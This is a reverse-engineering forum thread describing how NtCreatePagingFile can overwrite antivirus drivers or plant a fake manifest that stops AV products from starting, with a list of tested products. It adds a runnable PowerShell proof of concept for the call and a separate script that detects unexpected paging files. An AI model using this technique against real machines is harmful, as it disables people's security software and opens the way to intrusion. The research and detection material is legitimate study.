A forum for reverse engineering, OS internals and malware analysis 

 #16327  by 0x16/7ton
 Sun Oct 28, 2012 3:47 am
Hello Kernelmode :)
In this post I'll show you how to block the work of AV software, and the example victim will be, of course, Kaspersky :lol:
After some research, in smss.exe I came across the function NtCreatePagingFile.
Its definition is as follows:
Code:
NTSTATUS NtCreatePagingFile(
    IN PUNICODE_STRING PageFileName,
    IN PLARGE_INTEGER InitialSize,
    IN PLARGE_INTEGER MaximumSize,
    IN ULONG Reserved
);
It's no secret that smss.exe uses this function to create swap files during Windows startup.
The Session Manager takes the parameters for this API from the registry key:
\Registry\Machine\System\CurrentControlSet\Control\Session Manager\Memory
PagingFiles - path to the page files with their initial and maximum size

In general, the idea is to use swap file creation for our needs.
Use NtCreatePagingFile with the PageFileName parameter equal to, for example, the path to an AV driver.
The result of this experiment was the successful rewriting of AV drivers by a swap file.
Further attempts were made to swap the main DLL of Kaspersky, but alas, NtCreatePagingFile returned STATUS_SHARING_VIOLATION.
After that, I came up with another idea: create a swap file of this type:
C:\%path_to_kaspersky_dir%\avp.exe.manifest
That is, we create a fake manifest file; as a result, after reboot Kaspersky could not run any GUI or service process :twisted:
Limitations, notes:
  - NtCreatePagingFile checks at the start the current number of paging files (MmNumberOfPagingFiles) against a hardcoded value in the function body and returns STATUS_TOO_MANY_PAGING_FILES if they are equal (on my Windows XP it is 16).
  - We need SeCreatePagefilePrivilege to use the function NtCreatePagingFile.
  - Of course, blocking the AV software only works after a reboot.
  - NtCreatePagingFile extends the paging file maximum on the currently running system, but after reboot our created file will not be a paging file. And here is the funny moment: if we create a manifest file in the AV directory, we cannot delete it after reboot, because the AV protects its files :)
The list of AVs which were tested with this method:
Vulnerable:
  - Kaspersky
  - Eset
  - Avast
  - McAfee
  - AVG
  - ZoneAlarm
Not vulnerable:
  - Panda 2013
  - DrWeb
Here is a link to a video of the working PoC:
http://www.sendspace.com/file/oyhly7

It would be cool if you test this method with other AVs :)
Thx for reading ^_^ and many thanks to EP_X0FF for helping me.
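The call the post describes, as an added example (the poster's own PoC exists only in the linked video; this is not their code). It enables SeCreatePagefilePrivilege with RtlAdjustPrivilege, builds the UNICODE_STRING by hand so the buffer stays valid for the call, invokes NtCreatePagingFile on a caller-chosen path, and decodes the NTSTATUS values mentioned in the post. The default target `C:\Temp\pf_test.bin` and the sizes are assumptions for a throw-away VM, deliberately not an AV directory; the `\??\` prefix turns the DOS path into the NT path the kernel expects.

```powershell
# Added example, not the original poster's code. Calls NtCreatePagingFile on a
# caller-chosen path after enabling SeCreatePagefilePrivilege, then decodes the
# NTSTATUS values discussed in the post. Use only in a disposable VM: on success
# the target becomes a live paging file that cannot be deleted until reboot.
param(
    # Assumption: a scratch location for the demonstration, not an AV directory.
    [string]$TargetPath = 'C:\Temp\pf_test.bin',
    [long]$InitialMB = 16,
    [long]$MaximumMB = 16
)

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class NtPaging
{
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING
    {
        public ushort Length;        // bytes, without terminator
        public ushort MaximumLength; // bytes, including terminator
        public IntPtr Buffer;
    }

    // Same prototype as in the post; Reserved is the page-file priority on newer kernels.
    [DllImport("ntdll.dll")]
    public static extern int NtCreatePagingFile(
        ref UNICODE_STRING PageFileName, ref long InitialSize, ref long MaximumSize, uint Reserved);

    // Undocumented but long-stable: enables a privilege in the process token by LUID.
    // BOOLEAN is one byte, so byte (not bool) is used to avoid 4-byte BOOL marshaling.
    [DllImport("ntdll.dll")]
    public static extern int RtlAdjustPrivilege(uint Privilege, byte Enable, byte CurrentThread, out byte WasEnabled);

    public const uint SE_CREATE_PAGEFILE_PRIVILEGE = 15; // LUID of SeCreatePagefilePrivilege

    public static int EnablePrivilege()
    {
        byte was;
        return RtlAdjustPrivilege(SE_CREATE_PAGEFILE_PRIVILEGE, 1, 0, out was);
    }

    // ntPath must be an NT-style name such as \??\C:\Temp\pf_test.bin
    public static int CreatePagingFile(string ntPath, long initialBytes, long maxBytes)
    {
        IntPtr buf = Marshal.StringToHGlobalUni(ntPath);  // unmanaged copy lives across the call
        try
        {
            UNICODE_STRING us;
            us.Length        = (ushort)(ntPath.Length * 2);
            us.MaximumLength = (ushort)(us.Length + 2);
            us.Buffer        = buf;
            return NtCreatePagingFile(ref us, ref initialBytes, ref maxBytes, 0);
        }
        finally { Marshal.FreeHGlobal(buf); }
    }
}
'@

function Convert-NtStatus([int]$Status) {
    switch ('0x{0:X8}' -f $Status) {
        '0x00000000' { 'STATUS_SUCCESS: the path is now a live paging file' }
        '0xC0000061' { 'STATUS_PRIVILEGE_NOT_HELD: SeCreatePagefilePrivilege missing (not elevated?)' }
        '0xC0000043' { 'STATUS_SHARING_VIOLATION: target is open elsewhere (the DLL case in the post)' }
        '0xC0000097' { 'STATUS_TOO_MANY_PAGING_FILES: kernel limit on paging files reached' }
        '0xC0000022' { 'STATUS_ACCESS_DENIED: the file system or a filter refused the create' }
        default      { "NTSTATUS $_" }
    }
}

$priv = [NtPaging]::EnablePrivilege()
"RtlAdjustPrivilege -> $(Convert-NtStatus $priv)"
if ($priv -ne 0) { return }

$ntPath = '\??\' + $TargetPath
$status = [NtPaging]::CreatePagingFile($ntPath, $InitialMB * 1MB, $MaximumMB * 1MB)
"NtCreatePagingFile($ntPath) -> $(Convert-NtStatus $status)"
```

Run it from an elevated PowerShell whose bitness matches the OS. Administrators hold SeCreatePagefilePrivilege but it is disabled in the token until RtlAdjustPrivilege turns it on, which is why a non-elevated session reports STATUS_PRIVILEGE_NOT_HELD. As the post notes, a successful call leaves the target in use as a paging file until the next reboot.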
 #16811  by EP_X0FF
 Sat Nov 24, 2012 1:33 pm
 #18421  by r3shl4k1sh
 Tue Mar 05, 2013 10:56 am
Don't you need more than Admin privileges in order to write into the AV folder?
AFAIK Avast (at least) doesn't let you write inside that directory.
 #18454  by 0x16/7ton
 Wed Mar 06, 2013 9:07 pm
I just hate it when people discuss without any facts shown.
The latest version of Avast, 8.0.1482, is still vulnerable to this trick:
http://www.sendspace.com/file/ixk9eh
Your question is totally off-topic; all you need is in the first post.
 #18465  by r3shl4k1sh
 Thu Mar 07, 2013 12:58 pm
0x16/7ton wrote: Your question is totally off-topic; all you need is in the first post.
Probably you should read English with more patience... I didn't ask about your ability to make this trick work against Avast.
My question was whether you have to have special privileges in order to write a file in the Avast directory, or whether you can do it with any user?
 #18466  by EP_X0FF
 Thu Mar 07, 2013 2:25 pm
r3shl4k1sh wrote:
0x16/7ton wrote: Your question is totally off-topic; all you need is in the first post.
Probably you should read English with more patience... I didn't ask about your ability to make this trick work against Avast.
My question was whether you have to have special privileges in order to write a file in the Avast directory, or whether you can do it with any user?
You mean, does Avast control its own directory as part of self-protection? If you saw the demo, he is using Windows XP and running the PoC from the default account with admin rights. On later OS versions you need in any case to elevate your rights (if you have not done so already) to write to %ProgramFiles%.
 #18467  by 0x16/7ton
 Thu Mar 07, 2013 2:57 pm
r3shl4k1sh wrote:
0x16/7ton wrote: Your question is totally off-topic; all you need is in the first post.
Probably you should read English with more patience... I didn't ask about your ability to make this trick work against Avast.
My question was whether you have to have special privileges in order to write a file in the Avast directory, or whether you can do it with any user?
Are you kidding me? Maybe you should write more correctly? How am I supposed to understand this:
r3shl4k1sh wrote: AFAIK Avast (at least) doesn't let you write inside that directory.
And yes, you need admin rights, because by default in Windows administrator accounts have the NtCreatePagingFile privilege.
 #18468  by r3shl4k1sh
 Thu Mar 07, 2013 3:15 pm
EP_X0FF wrote: You mean, does Avast control its own directory as part of self-protection? If you saw the demo, he is using Windows XP and running the PoC from the default account with admin rights. On later OS versions you need in any case to elevate your rights (if you have not done so already) to write to %ProgramFiles%.
I can't see that he is using the default admin account in either demo.

I have an account which is in the Administrators group, and whenever I try to create a file in the Avast directory (using Explorer) I get an "Access Denied" message.

Maybe it only lets you create a file there using NtCreatePagingFile?!
 #18470  by EP_X0FF
 Thu Mar 07, 2013 3:46 pm
Avast hooks the NTFS driver's major handlers by replacing them with its own, specifically (at least on 32-bit XP):

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_WRITE
IRP_MJ_SET_INFORMATION
IRP_MJ_CLEANUP

by aswSP.sys (SP here probably stands for SelfProtection). I have no idea why they used this instead of a filter.

This is used to restrict access to the Avast folder and files. However, since the PoC works, aswSP allows certain calls (for example, NtCreatePagingFile results in IoCreateFile) if it thinks they come from the system.
 #19600  by listito
 Tue Jun 11, 2013 7:30 am
Amazing idea 0x16/7ton,

I just tested it on WinXP SP3 32-bit and it works like a charm, but it doesn't on Win 7 x64. Can someone please explain to me the internals of the idea? Why doesn't it run? Is it the PE loader that checks for invalid .manifest configs and refuses to run the .exe?

Does anyone know why it doesn't work on Panda and Dr.Web? IoCreateFile hooking?
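The first post notes that a file created this way stays a live paging file on the running system until reboot, and the later posts show that the AV's self-protection lets the create through. That gives a defender a check that does not depend on the AV: compare the paging files the kernel is actually using against the ones smss.exe was configured to create. The following is an added example, not code from the thread. It assumes that Win32_PageFileUsage reports the live paging-file list, reads the PagingFiles REG_MULTI_SZ from the Memory Management key where smss.exe takes its parameters, and flags any live paging file with no matching configured entry. The sample inputs, including the `C:\Program Files\ExampleAV\avp.exe.manifest` path, are constructed for the demonstration.

```powershell
# Added example, not from the original thread. A file created with
# NtCreatePagingFile stays a live paging file until reboot, so on a running
# system it can be found by comparing the paging files the kernel is using
# against the ones configured for smss.exe in the registry.
# Assumption: Win32_PageFileUsage reflects the live paging-file list.

$MemMgmtKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management'

# Each PagingFiles entry is "<path> <initialMB> <maximumMB>", e.g. "C:\pagefile.sys 0 0";
# newer systems may use "?:\pagefile.sys" meaning "any drive". Returns the path part only.
function ConvertFrom-PagingFilesValue {
    param([string[]]$Entries)
    foreach ($e in $Entries) {
        $e = $e.Trim()
        if ($e -eq '') { continue }
        if ($e -match '^(?<path>.+?)(\s+\d+\s+\d+)?$') {
            $matches['path']
        }
    }
}

# True when a live paging file corresponds to one of the configured entries.
function Test-ConfiguredPagingFile {
    param([string]$LivePath, [string[]]$ConfiguredPaths)
    foreach ($c in $ConfiguredPaths) {
        if ($c.StartsWith('?:')) {
            # "any drive": compare everything after the drive letter
            if ($LivePath.Length -gt 2 -and $LivePath.Substring(2) -ieq $c.Substring(2)) { return $true }
        } elseif ($LivePath -ieq $c) {
            return $true
        }
    }
    return $false
}

# Returns the live paging files that smss.exe was never told to create.
function Get-UnexpectedPagingFile {
    param(
        [string[]]$LivePaths,         # from Win32_PageFileUsage.Name
        [string[]]$ConfiguredEntries  # raw PagingFiles REG_MULTI_SZ
    )
    $configured = @(ConvertFrom-PagingFilesValue $ConfiguredEntries)
    foreach ($live in $LivePaths) {
        if (-not (Test-ConfiguredPagingFile $live $configured)) { $live }
    }
}

# --- constructed sample input so the logic can be exercised offline ---
# The second live path is hypothetical; it mirrors the manifest trick in the first post.
$sampleConfigured = @('C:\pagefile.sys 0 0')
$sampleLive = @('C:\pagefile.sys', 'C:\Program Files\ExampleAV\avp.exe.manifest')
'Sample run:'
Get-UnexpectedPagingFile -LivePaths $sampleLive -ConfiguredEntries $sampleConfigured

# --- the same check against the running system ---
'Live system:'
$liveNow = @((Get-CimInstance Win32_PageFileUsage).Name)
$configuredNow = @((Get-ItemProperty -Path $MemMgmtKey -Name PagingFiles).PagingFiles)
Get-UnexpectedPagingFile -LivePaths $liveNow -ConfiguredEntries $configuredNow
```

On the constructed sample the only line reported is the manifest path, since `C:\pagefile.sys` matches the configured entry. On a clean system the live-system section prints nothing; any path it does print is a paging file that appeared without going through the Session Manager's configuration, which is exactly the footprint the technique leaves until the next reboot. On Windows XP, where Get-CimInstance is unavailable, Get-WmiObject Win32_PageFileUsage returns the same Name property.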